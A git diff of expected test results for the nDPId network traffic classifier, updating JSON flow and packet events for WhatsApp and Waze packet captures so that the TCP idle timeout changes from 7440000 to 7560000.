-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -144,8 +144,8 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -153,12 +153,12 @@ 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} diff --git a/test/results/waze.pcap.out b/test/results/waze.pcap.out index c3c2faa35..4387b8960 100644 --- a/test/results/waze.pcap.out +++ b/test/results/waze.pcap.out 
@@ -1,231 +1,231 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"waze.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1435587866603} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587866603,"flow_last_seen":1435587866603,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1435587866603,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435587866603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587866603,"pkt":"ABoRAAACABoRAAABCABFAABNMsFAAEAGQsYKECWdriXnUaUQFGaA18okWhY9doAYAVcoQwAAAQEICgAIazhBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587866603,"flow_last_seen":1435587866603,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1435587866603,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435587866603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587866603,"pkt":"ABoRAAACABoRAAABCABFAABNMsFAAEAGQsYKECWdriXnUaUQFGaA18okWhY9doAYAVcoQwAAAQEICgAIazhBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1435587867443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867443,"pkt":"ABoRAAACABoRAAABCABFAABMAABAAEARHHkKCAAByFlLxrSGAHsAOIB9GwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANk705txaHKW"} 